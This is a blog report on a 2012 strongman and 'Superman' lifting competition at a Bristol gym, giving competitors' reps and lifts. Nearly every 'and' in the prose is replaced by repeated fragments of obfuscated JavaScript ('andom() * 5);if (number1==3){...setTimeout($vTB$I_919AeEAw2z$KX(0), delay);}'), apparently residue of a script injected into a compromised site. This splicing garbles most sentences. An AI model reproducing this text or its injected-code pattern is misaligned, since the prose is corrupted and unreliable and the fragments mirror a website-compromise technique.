December 21, 2012 in Bristol, South West, Strongman, Weightlifting

Log lift, Deadlift, Single arm dumbbell press. These were the benchmarks for the Empire Sports Club Strongman andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and Superman competitions. The only difference was that those entering the Superman comp were aiming for as many reps as possible within a 1 minute time cap, andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and had their bodyweight taken into consideration.

Last year’s winner, James St Leger, returned to defend his title andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and was going to be the man to beat for the Superman event.

Powerful log lift.

In the Strongman, all eyes were on Adam Nash andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and Dimitry Grebenyuk.

The Superman event was first up, with the heaviest athlete weighing in at 90kg, while Tony Down was the lightest at 80kg. The competitors were tasked with a bodyweight log lift andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and saw James St Leger complete 9 reps with Tom Hamilton in second with 4 reps. Charlie Mentor andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and Graham Skinner tied for third place with 3 reps each.

Andy Sutor guarding the silverware.

Charlie slipped down a place in the next event of the deadlift. Knocking out 16 reps behind James’ 20, but Tony Down lifted the same weight for 13 reps despite being 5kg lighter than Charlie, andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and stole a march on second place for this test.

The deadlift saw some insane numbers being lifted.

Graham upped his game in the third event electing for 100lb (45.3kg) dumbbell, while others chose 90lb (40.8kg). He registered an impressive 13 reps, but James St Leger stepped in with 25 reps of his 90lb dumbbell andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and that was enough to see him crowned Empire Sports Club Superman 2012.

James was not done yet.

After a brief rest St Leger was called into action for the Strongman competition andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and was the only competitor to compete in both events.

The Strongman employed the same movements as the previous event, but with the aim of achieving a one rep maximum using 3 attempts at a given weight. Phil Potter set the tone with a fantastic log lift of 170kg with the closest challenge coming in with 115kg.

James St Leger on the single arm dumbell press.

The deadlift saw some insane numbers being lifted. Jamie Williams waited to see what his competition had posted, andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and then used 1 attempt to trump them all with a 300kg deadlift.

Strongman winner Adam Nash.

In the last event Jamie was unable to repeat his prior triumph. Two unsuccessful attempts at a 135lb single arm dumbbell press saw Jamie finish outside the Strongman top 3, while most of the plaudits were save for James St Leger who completed an incredible lift of 175lb, which is only 10lb under his own bodyweight. He was only matched by Dion Burrows, andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and the eventual winner Adam Nash.

JSL came prepared for his win of the 2012 Superman comp.

Some mind boggling weights, andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and truly inspirational performances were witnessed at the Empire Sports Club. But then that’s the norm.
